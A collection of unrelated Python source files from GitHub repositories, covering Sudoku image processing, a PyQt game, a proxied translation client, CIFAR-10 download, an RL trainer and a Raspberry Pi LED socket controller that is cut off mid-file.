getIntersectionTime_old(Origin, Heading, Speed, OS_Speed)\n for point in points:\n print_pos(point, OS_Speed, Direction, Origin, True)\n\n txt = \"\"\"\\n\\nThe different thetas, when time is negative, depends on the meaning of a negative time. \n TS has a fixed heading, so negative time means a position found with negative velocity.\n OS instead,\n - Could have had a heading useful to intercept TS said time ago (theta found with cone)\n - Could intercept, backwards, TS with negative velocity (theta found with brute force)\"\"\"\n print(txt)\n # fig.text(.1, .1, \"fsfafa\")\n # Adjust layout for better visualization\n plt.tight_layout()\n # Show the plots\n plt.show()\n\n\ndef print_pos(point, OS_Speed, Direction, Origin, booool):\n t = point[0]\n p = point[1]\n theta = point[2]\n if booool:\n distance = distance_t(t, OS_Speed, theta, Direction, Origin)\n print(\" Time: \", round(t, 2), \" theta: \", round(theta, 2), \"distance: \", round(distance, 2), \" (\",\n p[0], \",\", p[1], \")\")\n else:\n print(\" Time: \", round(t, 2), \" theta: \", round(theta, 2), \" (\",\n p[0], \",\", p[1], \")\")\n\ndef distance_t(t, OS_Speed, theta, Direction, Origin):\n p_OS = t * np.array([OS_Speed * cos(theta), OS_Speed * sin(theta), 1])\n p_TS = Origin + Direction * t\n return LA.norm(p_OS - p_TS)\n\n\ndef getIntersectionTime_old(Origin, Heading, Speed, OS_Speed):\n v1 = OS_Speed\n v2 = Speed\n h2 = Heading\n H = Origin[1]\n L = Origin[0]\n\n k = atan2(-H, L)\n asin_arg = v2 / v1 * sin(h2 + k)\n theta1 = asin(asin_arg) - k\n theta2 = pi - k - asin(asin_arg) - k\n theta2 = theta2 % pi\n t1 = L / (v1 * cos(theta1) - v2 * cos(h2))\n t2 = L / (v1 * cos(theta2) - v2 * cos(h2))\n\n p = np.array([L, H]) + t1 * np.array([v2 * cos(h2), sin(h2)])\n ipoint = [t1, p, theta1]\n p = np.array([L, H]) + t2 * np.array([v2 * cos(h2), sin(h2)])\n ipoint2 = [t2, p, theta2]\n\n return [ipoint, ipoint2]\n\n\ndef getIntersectionTime_new(Origin, Direction, OS_Speed):\n gamma = sqrt(OS_Speed ** 2 + 1) / (OS_Speed ** 2 + 1)\n c2 = 1 - gamma ** 2 * np.dot(Direction, Direction)\n c1 = -gamma ** 2 * np.dot(Direction, Origin)\n c0 = -gamma ** 2 * np.dot(Origin, Origin)\n delta = c1 ** 2 - c0 * c2\n\n if c2 != 0:\n \"\"\"if delta < 0:\n print(\" No intersections\")\n el\"\"\"\n if delta == 0:\n t = (-c1 + sqrt(delta)) / c2\n p = Origin + Direction * t\n ipoint = [t, p, atan2(p[1], p[0])]\n # print(\" Theta: \", atan2(p[1], p[0]), \"time: \", t, \" (\", p[0], \",\", p[1], \")\")\n return [ipoint, [0, np.array([0, 0, 0]), 0]]\n elif delta > 0:\n t1 = (-c1 + sqrt(delta)) / c2\n t2 = (-c1 - sqrt(delta)) / c2\n p = Origin + Direction * t1\n ipoint1 = [t1, p, atan2(p[1], p[0])]\n dis = distance_t(t1, OS_Speed, atan2(p[1], p[0]), Direction, Origin)\n\n p = Origin + Direction * t2\n ipoint2 = [t2, p, atan2(p[1], p[0])]\n dis = distance_t(t2, OS_Speed, atan2(p[1], p[0]), Direction, Origin)\n\n return [ipoint1, ipoint2]\n elif c2 == 0:\n if c1 != 0:\n t = -c0 / (2 * c1)\n p = Origin + Direction * t\n ipoint = [t, p, atan2(p[1], p[0])]\n # print(\" Theta: \", atan2(p[1], p[0]), \"time: \", t, \" (\", p[0], \",\", p[1], \")\")\n return [ipoint, [0, np.array([0, 0, 0]), 0]]\n else:\n print(\" wtf, ts and os coincide\")\n\n return []\n\n\ndef SetUpPlot(TS, speed, vel_vect, fig, ax):\n # Plot the 3D subplot\n ax = fig.add_subplot(121, projection='3d')\n\n # fig = plt.figure()\n # ax = fig.add_subplot(111, projection='3d')\n ax.scatter(TS[0], TS[1], TS[2], label='obs origin')\n ax.scatter(0, 0, 0, label='vh origin')\n\n ax = PlotPath(ax, TS, TS + vel_vect * OBS_TIME, 'obs path')\n\n line_x, line_y, line_z = zip(TS, TS - vel_vect * OBS_TIME)\n ax.plot(line_x, line_y, line_z, color='c')\n\n ax = ConePlot(ax, speed)\n\n # Set labels for the axes\n ax.set_xlabel('X')\n ax.set_ylabel('Y')\n ax.set_zlabel('t')\n return ax\n\n\ndef PlotPath(ax, p1, p2, name):\n line_x, line_y, line_z = zip(p1, p2)\n ax.plot(line_x, line_y, line_z, label=name)\n ax.scatter(p2[0],p2[1],p2[2])\n return ax\n\n\ndef ConePlot(ax, speed):\n theta = pi / 2 - atan2(1, speed)\n for a in range(0, int(2 * pi / step)):\n # Calculate the current angle\n angle = a * step\n p2 = np.array([0, 0, speed * OBS_TIME])\n p2 = y_rotation(p2, -theta)\n p2 = z_rotation(p2, angle)\n line_x, line_y, line_z = zip(np.array([0, 0, 0]), p2)\n ax.plot(line_x, line_y, line_z, '-r', alpha=0.2)\n line_x, line_y, line_z = zip(np.array([0, 0, 0]), -p2)\n ax.plot(line_x, line_y, line_z, '-', color='grey', alpha=0.2)\n return ax\n\n\ndef x_rotation(vector, theta):\n \"\"\"Rotates 3-D vector around x-axis\"\"\"\n R = np.array([[1, 0, 0], [0, np.cos(theta), -np.sin(theta)], [0, np.sin(theta), np.cos(theta)]])\n return np.dot(R, vector)\n\n\ndef y_rotation(vector, theta):\n \"\"\"Rotates 3-D vector around y-axis\"\"\"\n R = np.array([[np.cos(theta), 0, np.sin(theta)], [0, 1, 0], [-np.sin(theta), 0, np.cos(theta)]])\n return np.dot(R, vector)\n\n\ndef z_rotation(vector, theta):\n \"\"\"Rotates 3-D vector around z-axis\"\"\"\n R = np.array([[np.cos(theta), -np.sin(theta), 0], [np.sin(theta), np.cos(theta), 0], [0, 0, 1]])\n return np.dot(R, vector)\n\n\nmain()\n","repo_name":"SamueleD98/oal","sub_path":"src/intercept_test.py","file_name":"intercept_test.py","file_ext":"py","file_size_in_byte":8803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74912397561","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef preprocess(image, default=19, dilate=True):\n '''\n Darken grid and preliminary thresholding\n '''\n img = cv2.GaussianBlur(image,(5,5),0)\n thresh = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY_INV,default,2)\n kernel = cv2.getStructuringElement(cv2.MORPH_CROSS,(3,3))\n res = cv2.dilate(thresh, kernel) if dilate else thresh\n return res\n\ndef orderPoints(cnt):\n '''\n Rearrange 4 point contour in clockwise direction starting from top left\n '''\n cnt = cnt.reshape((4,2))\n rect = np.zeros((4,2), dtype='float32')\n s = cnt.sum(axis=1)\n rect[0] = cnt[np.argmin(s)] #Top-Left\n rect[2] = cnt[np.argmax(s)]\n diff = np.diff(cnt, axis=1)\n rect[1] = cnt[np.argmin(diff)] # Bottom-Left\n rect[3] = cnt[np.argmax(diff)]\n return rect\n\ndef four_point_transform(img, contour):\n '''\n Unwarp Puzzle and Enlarge Puzzle\n '''\n \n epsilon = 0.1*cv2.arcLength(contour,True)\n approx = cv2.approxPolyDP(contour,epsilon,True)\n\n (tl,tr,bl,br)= rect = orderPoints(approx)\n \n # c^2 = x^2 + y^2\n widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n maxWidth = max(int(widthA), int(widthB))\n \n heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n maxHeight = max(int(heightA), int(heightB))\n \n dst = np.array([[0, 0],[maxWidth - 1, 0],[maxWidth - 1, maxHeight - 1], [0, maxHeight - 1]], dtype = \"float32\")\n \n M = cv2.getPerspectiveTransform(rect, dst)\n warped = cv2.warpPerspective(img, M, (maxWidth, maxHeight))\n return warped\n\n\ndef centralize(output, centroid, label):\n img2 = np.zeros(output.shape)\n img2[output == label] = 255.0\n\n rows, cols = img2.shape \n target_center = (int(rows/2), int(cols/2))\n shift_x, shift_y = np.round(target_center - centroid).astype('float32')\n\n M = np.array([[1,0, shift_x], [0,1,shift_y]])\n\n dst = cv2.warpAffine(img2, M, (cols,rows))\n return dst\n \n\ndef largestnConnectedComponents(cell, n=4):\n nb_components, output, stats, centroids = cv2.connectedComponentsWithStats(cell, connectivity=4)\n sizes = stats[:, -1]\n indices = np.argsort(sizes)[::-1][:n]\n return output, indices, sizes[indices], centroids[indices]\n\ndef digitExists(cell, threshold=0.056):\n total_cell = cell.shape[0] * cell.shape[1]\n if np.count_nonzero(cell) / total_cell > threshold:\n return True\n else:\n return False\n\ndef extractdigits(cell_y,cell_x,grid, n=2, this=False):\n '''\n Returns a few images containing the largest components detected within the cell\n If None, returns empty list\n '''\n # x, y coordinates of the cell passed\n y_skips = int(np.floor(grid.shape[0] / 9))\n x_skips = int(np.floor(grid.shape[1] /9 ))\n \n y = y_skips * cell_y\n x = x_skips * cell_x\n \n cell = grid[y:y+y_skips, x:x+x_skips]\n\n\n # Check cell white percentage\n if not digitExists(cell):\n return []\n \n # Get the n largest connected Components\n output, indices, sizes, centroids = largestnConnectedComponents(cell, n)\n \n images = []\n centroids = centroids[1:]\n indices = indices[1:]\n for label, centroid in zip(indices, centroids):\n\n img = centralize(output, centroid, label)\n images.append(img)\n \n return images\n\ndef whitePct(img):\n return np.count_nonzero(img) / (img.shape[0] * img.shape[1]) *100\n\n\ndef repetitiveThreshold(img, target_pct):\n '''\n Repeatedly tries different blocksize for adaptive thresholding until target pct is achieved\n '''\n thres = 55\n block = 5\n whites = whitePct(img)\n\n while whites > target_pct:\n\n threshed = cv2.adaptiveThreshold(img,255,cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY_INV, thres,block)\n thres += 100\n #block += 5\n whites = whitePct(threshed)\n return threshed\n\n\ndef floodfillGrid(img, overlapped, coords, i):\n '''\n Floodfill ith index of coords array, if failed, try i+1 index. Purpose is to remove gridlines\n '''\n coord = coords[i]\n h, w = img.shape\n u_mask = np.zeros((h+2, w+2), np.uint8)\n if overlapped[coord[0]][coord[1]]!= 0:\n try:\n cv2.floodFill(img, u_mask, (coord[0],coord[1]), 0)\n except Exception as e:\n\n return\n\ndef repetitiveFloodfill(dilated, overlapped, coords, i):\n whites = whitePct(dilated)\n\n while whites > 10:\n floodfillGrid(dilated, overlapped, coords, i)\n i += 1\n whites = whitePct(dilated)\n\ndef aspectratio(cell, highest=0.98, lowest=0.45):\n '''\n Determine that the largest contour has aspect ratio within the given range\n '''\n cell = cell.astype('uint8')\n _, cnt, hiers = cv2.findContours(cell,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\n cnt = sorted(cnt, key=cv2.contourArea, reverse=True)[0]\n x,y,w,h = cv2.boundingRect(cnt)\n\n return w/h < highest and w/h >lowest\n \ndef view(img, _size=(800,800)):\n view = cv2.resize(img, _size)\n cv2.imshow('Sudoku', view)\n cv2.waitKey()","repo_name":"henrybyhee/SudokuVisionSolver","sub_path":"vision_utils.py","file_name":"vision_utils.py","file_ext":"py","file_size_in_byte":5207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33977304984","text":"import sys\r\nfrom PyQt5.QtCore import Qt, QSize\r\nfrom PyQt5.QtGui import QPainter, QImage\r\nfrom PyQt5.QtWidgets import (QApplication, QWidget)\r\n\r\n\r\nclass UFO_tracker(QWidget):\r\n def __init__(self):\r\n super().__init__()\r\n self.setGeometry(200, 200, 500, 500)\r\n self.setWindowTitle('Управление НЛО')\r\n self.x = 0\r\n self.y = 0\r\n self.img_r = 40 # учет размера картинки для смещения координат\r\n self.image = QImage(QSize(10, 10), QImage.Format_RGB32)\r\n self.image.load('UFO1.png')\r\n\r\n def keyPressEvent(self, event):\r\n key = event.key()\r\n step = 10 # шаг смещения по нажатию\r\n if key == Qt.Key_Left:\r\n self.x -= step\r\n if self.x < 0: self.x = self.width() - self.img_r\r\n elif key == Qt.Key_Up:\r\n self.y -= step\r\n if self.y < 0: self.y = self.height() - self.img_r\r\n elif key == Qt.Key_Right:\r\n self.x += step\r\n if self.x > self.width() - self.img_r: self.x = 0\r\n elif key == Qt.Key_Down:\r\n self.y += step\r\n if self.y > self.height() - self.img_r: self.y = 0\r\n\r\n def paintEvent(self, event):\r\n qp = QPainter()\r\n qp.begin(self)\r\n qp.drawImage(self.x, self.y, self.image)\r\n qp.end()\r\n self.update()\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n ex = UFO_tracker()\r\n ex.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"Alyona0/13_QT9_UFO_control","sub_path":"UFO_control.py","file_name":"UFO_control.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"36806047075","text":"# -*- coding: utf-8 -*-\n# Sublime Text 3 test\n__version__ = \"1.0.0\"\n\ntry:\n # Python 3 assumption\n from urllib.request import urlopen, HTTPHandler, HTTPSHandler, build_opener, Request\n from urllib.parse import urlencode, quote\nexcept ImportError:\n # Python 2 assumption\n from urllib import urlopen, urlencode, quote\n from urllib2 import HTTPHandler, HTTPSHandler, build_opener, Request\n\nfrom json import loads\n\nimport re\n\ntry:\n # Python 3 assumption\n from http.client import HTTPConnection, HTTPSConnection\nexcept ImportError:\n # Python 2 assumption\n from httplib import HTTPConnection, HTTPSConnection\n\nimport socks\n\nimport ssl\n\n\nclass GoogletTranslateException(Exception):\n \"\"\"\n Default GoogletTranslate exception\n >>> GoogletTranslateException(\"DoctestError\")\n GoogletTranslateException('DoctestError',)\n \"\"\"\n pass\n\n\nclass GoogletTranslate(object):\n string_pattern = r\"\\\"(([^\\\"\\\\]|\\\\.)*)\\\"\"\n match_string = re.compile(\n r\"\\,?\\[\"\n + string_pattern + r\"\\,\"\n + string_pattern\n + r\"\\]\")\n\n error_codes = {\n 401: \"ERR_TARGET_LANGUAGE_NOT_SPECIFIED\",\n 501: \"ERR_SERVICE_NOT_AVAILABLE_TRY_AGAIN_OR_USE_PROXY\",\n 503: \"ERR_VALUE_ERROR\",\n 504: \"ERR_PROXY_NOT_SPECIFIED\",\n }\n\n def __init__(self, source_lang='en', target_lang='zh-CN'):\n self.cache = {\n 'languages': None,\n }\n self.api_urls = {\n 'translate': 'https://translate.googleapis.com/translate_a/single?client=gtx&ie=UTF-8&oe=UTF-8&dt=t',\n }\n if not target_lang:\n raise GoogletTranslateException(self.error_codes[401])\n self.source = source_lang\n self.target = target_lang\n\n @property\n def languages(self, cache=True):\n try:\n if not self.cache['languages'] and cache:\n self.cache['languages'] = loads('{\"languages\":{\"af\":\"Afrikaans\",\"sq\":\"Albanian\",\"ar\":\"Arabic\",'\n '\"az\":\"Azerbaijani\",\"eu\":\"Basque\",\"bn\":\"Bengali\",\"be\":\"Belorussian\",'\n '\"bg\":\"Bulgarian\",\"ca\":\"Catalan\",\"zh-CN\":\"Chinese Simplified\",'\n '\"zh-TW\":\"Chinese Traditional\",\"hr\":\"Croatian\",\"cs\":\"Czech\",'\n '\"da\":\"Danish\",\"nl\":\"Dutch\",\"en\":\"English\",\"eo\":\"Esperanto\",'\n '\"et\":\"Estonian\",\"tl\":\"Filipino\",\"fi\":\"Finnish\",\"fr\":\"French\",'\n '\"gl\":\"Galician\",\"ka\":\"Georgian\",\"de\":\"German\",\"el\":\"Greek\",'\n '\"gu\":\"Gujarati\",\"ht\":\"Haitian Creole\",\"iw\":\"Hebrew\",'\n '\"hi\":\"Hindi\",\"hu\":\"Hungarian\",\"is\":\"Icelandic\",'\n '\"id\":\"Indonesian\",\"ga\":\"Irish\",\"it\":\"Italian\",'\n '\"ja\":\"Japanese\",\"kn\":\"Kannada\",\"ko\":\"Korean\",'\n '\"la\":\"Latin\",\"lv\":\"Latvian\",\"lt\":\"Lithuanian\",\"mk\":\"Macedonian\",'\n '\"ms\":\"Malay\",\"mt\":\"Maltese\",\"no\":\"Norwegian\",\"fa\":\"Persian\",'\n '\"pl\":\"Polish\",\"pt\":\"Portuguese\",\"ro\":\"Romanian\",\"ru\":\"Russian\",'\n '\"sr\":\"Serbian\",\"sk\":\"Slovak\",\"sl\":\"Slovenian\",\"es\":\"Spanish\",'\n '\"sw\":\"Swahili\",\"sv\":\"Swedish\",\"ta\":\"Tamil\",\"te\":\"Telugu\",'\n '\"th\":\"Thai\",\"tr\":\"Turkish\",\"uk\":\"Ukrainian\",\"ur\":\"Urdu\",'\n '\"vi\":\"Vietnamese\",\"cy\":\"Welsh\",\"yi\":\"Yiddish\"}}')\n except IOError:\n raise GoogletTranslateException(self.error_codes[503])\n except ValueError:\n raise GoogletTranslateException(self.error_codes[501])\n return self.cache['languages']\n\n def translate(self, text, format='html'):\n data = self._get_translation_from_google(text)\n # if (format == 'plain')\n # data =\n return data\n\n def _get_translation_from_google(self, text):\n try:\n json5 = self._get_json5_from_google(text).decode('utf-8')\n except IOError:\n raise GoogletTranslateException(self.error_codes[503])\n except ValueError:\n raise GoogletTranslateException(self.error_codes[501])\n return self._unescape(self._get_translation_from_json5(json5.encode('utf-8')))\n\n def _get_json5_from_google(self, text):\n esc_surce = quote(text, '')\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}\n enable_proxy = True\n if enable_proxy:\n opener = build_opener(SocksiPyHandler(socks.PROXY_TYPE_SOCKS5, \"127.0.0.1\", 9050))\n result_url = self.api_urls['translate'] + \"&sl=%s&tl=%s&text=%s\" % (self.source, self.target, esc_surce)\n print('result_url1:' + result_url)\n req = Request(result_url, headers=headers)\n result = opener.open(req, timeout=5).read()\n json = result\n\n else:\n try:\n result_url = self.api_urls['translate'] + \"&sl=%s&tl=%s&text=%s\" % (self.source, self.target, esc_surce)\n print('result_url2:' + result_url)\n result = urlopen(result_url, timeout=5, headers=headers).read()\n json = loads(result.decode('utf-8'))\n except IOError:\n raise GoogletTranslateException(self.error_codes[503])\n except ValueError:\n raise GoogletTranslateException(result)\n return json\n\n def _get_translation_from_json5(self, content):\n result = \"\"\n pos = 2\n while True:\n m = self.match_string.match(content.decode('utf-8'), pos)\n if not m:\n break\n result += m.group(1)\n pos = m.end()\n return result\n\n @staticmethod\n def _unescape(text):\n return loads('\"%s\"' % text)\n\n\nclass SocksiPyConnection(HTTPConnection):\n def __init__(self, proxytype, proxyaddr, proxyport=None, rdns=True, username=None, password=None, *args, **kwargs):\n self.proxyargs = (proxytype, proxyaddr, proxyport, rdns, username, password)\n HTTPConnection.__init__(self, *args, **kwargs)\n\n def connect(self):\n self.sock = socks.socksocket()\n self.sock.setproxy(*self.proxyargs)\n if type(self.timeout) in (int, float):\n self.sock.settimeout(self.timeout)\n self.sock.connect((self.host, self.port))\n\n\nclass SocksiPyConnectionS(HTTPSConnection):\n def __init__(self, proxytype, proxyaddr, proxyport=None, rdns=True, username=None, password=None, *args, **kwargs):\n self.proxyargs = (proxytype, proxyaddr, proxyport, rdns, username, password)\n HTTPSConnection.__init__(self, *args, **kwargs)\n\n def connect(self):\n sock = socks.socksocket()\n sock.setproxy(*self.proxyargs)\n if type(self.timeout) in (int, float):\n sock.settimeout(self.timeout)\n sock.connect((self.host, self.port))\n self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file)\n\n\nclass SocksiPyHandler(HTTPHandler, HTTPSHandler):\n def __init__(self, *args, **kwargs):\n self.args = args\n self.kw = kwargs\n HTTPHandler.__init__(self)\n\n def http_open(self, req):\n def build(host, port=None, strict=None, timeout=0):\n conn = SocksiPyConnection(*self.args, host=host, port=port, strict=strict, timeout=timeout, **self.kw)\n return conn\n\n return self.do_open(build, req)\n\n def https_open(self, req):\n def build(host, port=None, strict=None, timeout=0):\n conn = SocksiPyConnectionS(*self.args, host=host, port=port, strict=strict, timeout=timeout, **self.kw)\n return conn\n\n return self.do_open(build, req)\n\n\nif __name__ == \"__main__\":\n translate = GoogletTranslate('en', 'fr')\n resulto = translate.translate('Hello, Beijing', 'html')\n print('resulto:' + resulto)\n","repo_name":"zeusintuivo/SublimeText3-GoogleT","sub_path":"test/testtranslate.py","file_name":"testtranslate.py","file_ext":"py","file_size_in_byte":8207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"26809743488","text":"from __future__ import print_function\nfrom __future__ import division\nfrom __future__ import absolute_import\n\nimport tensorflow as tf\nimport os\nfrom urllib.request import urlretrieve\nimport sys\nimport zipfile\nimport tarfile\nimport pickle\nimport cv2 as cv\nimport matplotlib.pyplot as plt\n\ndef print_download_progress(count, block_size, total_size):\n pct_complete = float(count * block_size)/total_size\n msg = \"\\r- Download progress: {0:.1%}\".format(pct_complete)\n sys.stdout.write(msg)\n sys.stdout.flush()\n\n\n\ndef download_cifa10(output_dir=None, url=None):\n if url == None:\n url = \"http://www.cs.toronto.edu/~kriz/cifar-10-python.tar.gz\"\n\n if output_dir == None:\n output_dir = \"./cifa10\"\n\n if os.path.exists(output_dir) == False:\n os.mkdir(output_dir)\n\n file_path = url.split(\"/\")[-1]\n file_path = os.path.join(output_dir, file_path)\n\n if os.path.exists(file_path) is False:\n file_path, _ = urlretrieve(url=url, filename=file_path, reporthook=print_download_progress)\n\n\n print(\"\")\n print(\"Download finished, Extracting file\")\n\n if file_path.endswith(\".zip\"):\n zipfile.ZipFile(file=file_path, mode=\"r\").extractall(output_dir)\n\n elif file_path.endswith((\".tar.gz\", \".tgz\")):\n tarfile.open(name=file_path, mode=\"r:gz\").extractall(output_dir)\n\ndef make_data(dir=None):\n if dir == None:\n return None\n else:\n f = os.listdir(dir)\n\n for i in range(5):\n file_name = os.path.join(dir, \"data_batch_\" + str(i+1))\n f = open(file_name, 'rb')\n data_dict = pickle.load(f, encoding='latin1')\n f.close()\n\n _X = data_dict[\"data\"]\n\n _Y = data_dict[\"labels\"]\n\n _X = _X.reshape([-1, 3, 32, 32])\n\n plt.imshow(_X[0,1,:,:])\n plt.show()\n print(\"dkjflkdj\")\n\n\nif __name__ == '__main__':\n download_cifa10()\n make_data(\"./cifa10/cifar-10-batches-py\")","repo_name":"dattv/ML-DL-Lecture-Notes","sub_path":"TFRecord/cifa10_TFRecord.py","file_name":"cifa10_TFRecord.py","file_ext":"py","file_size_in_byte":1946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"7180915714","text":"__author__ = 'jujuman'\n\nimport numpy as np\nimport hdnntools as hdt\nimport matplotlib.pyplot as plt\n\ndata = np.loadtxt('/home/jujuman/Research/ANI-DATASET/ANI-SF-TRAIN/cv_c08e_ntw_0/cost.dat',delimiter=' ',dtype=np.float32)\nprint(data)\nplt.plot (data[1:,0],hdt.hatokcal*np.sqrt(data[1:,1]),marker='o', color='blue', label='Train', linewidth=2)\nplt.plot (data[1:,0],hdt.hatokcal*np.sqrt(data[1:,2]),marker='o', color='red', label='Valid', linewidth=2)\nplt.plot (data[1:,0],hdt.hatokcal*np.sqrt(data[1:,3]),marker='o', color='green', label='Best', linewidth=2)\n\nplt.yscale('log')\n\nplt.title(\"C10H20 - ANI vs DFT\")\n\nplt.ylabel('Error')\nplt.xlabel('Epoch')\nplt.legend(bbox_to_anchor=(0.8, 0.95), loc=2, borderaxespad=0.,fontsize=16)\n\nfont = {'family' : 'Bitstream Vera Sans',\n 'weight' : 'normal',\n 'size' : 16}\n\nplt.rc('font', **font)\n\nplt.show()","repo_name":"Jussmith01/PycharmProjects","sub_path":"HD-AtomNNP/NeuroChemPrograms/plot_learning_curve.py","file_name":"plot_learning_curve.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"13073670029","text":"import argparse, os\nfrom tqdm import tqdm\nfrom typing import Any, Iterator, Mapping, MutableMapping, Optional, Union\n\nimport numpy as np\nimport numpy.random as rnd\nimport torch as pt\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom absl import logging\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom arguments import get_args\nfrom env import get_env_config, get_env, Toggle, Maze\nfrom helpers import get_p_action_target, value_act\nfrom model import get_actor_critic_config, ActorCritic, Reservoir\nfrom optimizer import CoreOptimizer\nfrom utils import activation_fn, convert_to_tensor, fix_seed, join_tokens, loss_fn, TensorDict, TensorType \n\nlogging.set_verbosity(logging.INFO)\n\n\nclass Trainer():\n\n '''\n Responsible for setting up model (including embedders and task modules), optimizer etc., as well as training and evaluation\n '''\n\n def __init__(self,\n args: MutableMapping[str, Any],\n actor_critic_config: Mapping[str, Any], \n output_dir: Optional[str] = None) -> None:\n \n self.save_iteration = args.save_iteration\n self.log_iteration = args.log_iteration\n self.output_dir = output_dir\n self.writer = SummaryWriter()\n\n self.transition_table = pt.Tensor([-1, 0, 1])\n assert args.n_actions == len(self.transition_table)\n\n self.actor_critic = ActorCritic(actor_critic_config).to(args.device)\n self.actor_target = ActorCritic(actor_critic_config).to(args.device)\n self.actor_target.load_state_dict(self.actor_critic.state_dict(), strict=False)\n self.loss_fn = loss_fn(args.loss_fn)\n self.reservoir = Reservoir(actor_critic_config, self.transition_table).to(args.device)\n\n if args.optimizer_class == 'adam':\n self.optimizer = pt.optim.Adam(self.actor_critic.parameters(), lr=args.lr, weight_decay=args.weight_decay) \n elif args.optimizer_class == 'rms_prop':\n self.optimizer = pt.optim.RMSprop(self.actor_critic.parameters(), lr=args.lr, weight_decay=args.weight_decay, momentum=args.momentum)\n elif args.optimizer_class == 'core':\n self.optimizer = CoreOptimizer(self.actor_critic.parameters(), lr=args.lr, args=args)\n elif args.optimizer_class == 'swarm':\n self.optimizer = SwarmOptimizer(self.actor_critic.parameters(), lr=args.lr, args=args)\n else:\n raise NotImplementedError()\n\n self.global_step = 1\n if hasattr(args, 'scheduler'):\n self.schedulers = utils.scheduler\n if hasattr(args, 'timer'):\n self.timer = utils.timer\n\n self.state_dict_path = f'state_dict/actor_critic_{args.env_id}'\n if self.output_dir:\n if os.path.isdir(self.output_dir):\n logging.info(f'Output directory \"{self.output_dir}\" already exists. Calling train will attempt to start from last checkpoint.')\n os.makedirs(self.output_dir, exist_ok=True)\n\n self.args = args\n\n def _save_states(self):\n\n '''Saves current step, model parameters, and optimizer parameters'''\n \n state = {\n 'model_state_dict': self.actor_critic.state_dict(),\n 'optimizer_state_dict': self.optimizer.state_dict(),\n 'global_step': int(self.global_step)\n }\n pt.save(state, self.state_dict_path)\n \n def _load_states(self,\n state_dict_path: str,\n step: Optional[int] = None) -> None:\n\n '''Loads current step, model parameters, and optimizer parameters'''\n \n if not os.path.exists(state_dict_path):\n raise ValueError(f'No file `{state_dict_path}`.')\n\n state = pt.load(state_dict_path)\n step = state.get['global_step']\n self.actor_critic.load_state_dict(state['model_state_dict'])\n self.optimizer.load_state_dict(state['optimizer_state_dict'])\n self.global_step.fill_(step)\n logging.info(f'Loaded state from step {step}.')\n return step\n\n def train(self,\n env: Union[Iterator, Any],\n load: Optional[bool] = False,\n state_dict_path: Optional[str] = None) -> None:\n\n if load:\n start_step = self._load_states(state_dict_path)\n else:\n start_step = self.global_step\n logging.info('start training')\n self.actor_critic.train(True)\n\n u, state_target, done = env.reset()\n if hasattr(self, 'reservoir'):\n x = self.reservoir.clear()\n\n p_action_list = []\n p_action_target_list = []\n\n for t in tqdm(range(start_step, self.args.n_episodes + start_step)):\n\n u, state_target = convert_to_tensor(u), convert_to_tensor(state_target)\n p_action, action = self.actor_critic.act(join_tokens(u, x))\n p_action_target = get_p_action_target(self.args, x, state_target, self.transition_table)\n x, state_transition = self.reservoir.update(x, idx = action)\n p_action_list.append(p_action.probs)\n p_action_target_list.append(p_action_target)\n\n u, state_target, done = env.step()\n self.global_step += 1\n\n if t % self.save_iteration == 0:\n self._save_states()\n\n if done:\n p_action_list = pt.stack(p_action_list, 0)\n p_action_target_list = pt.stack(p_action_target_list, 0)\n loss = self.loss_fn(pt.log(p_action_list), p_action_target_list, reduction='batchmean')\n self.writer.add_scalar('Loss/train', loss.item(), t)\n self.optimizer.zero_grad()\n loss.backward()\n self.optimizer.step()\n p_action_list = []\n p_action_target_list = []\n u, state_target, done = env.reset()\n x = self.reservoir.clear()\n\n self.writer.close()","repo_name":"sebvoigtlaender/latent_manifold_RL","sub_path":"trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":5918,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"38097091091","text":"import os\nimport sys\nimport multiprocessing\nimport socket\n\nimport time\nimport RPi.GPIO as GPIO\n\n \n#p = GPIO.PWM(18, 50) # 通道为 18 频率为 50Hz\n#p.start(0)\n#try:\n# while 1:\n# control_data = s.recv(20)\n# if control_data == b'start':\n# s.send(b'start ok')\n# GPIO.output(18,GPIO.LOW)\n #for dc in range(100, -1, -5):\n # p.ChangeDutyCycle(dc)\n # time.sleep(0.1)\n #for dc in range(0, 101, 5):\n # p.ChangeDutyCycle(dc)\n # time.sleep(0.1)\n# if control_data == b'end':\n# s.send(b'end ok')\n# GPIO.output(18,GPIO.HIGH)\n#except KeyboardInterrupt:\n# pass\n#p.stop()\n#GPIO.cleanup()\n\ndef start_led(control_data):\n control_data = b'null'\n print('start_led')\n s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n s.connect(('192.168.0.101', 7777))\n s.send(b'start_led_connect ok')\n while 1:\n control_data = s.recv(20)\n if 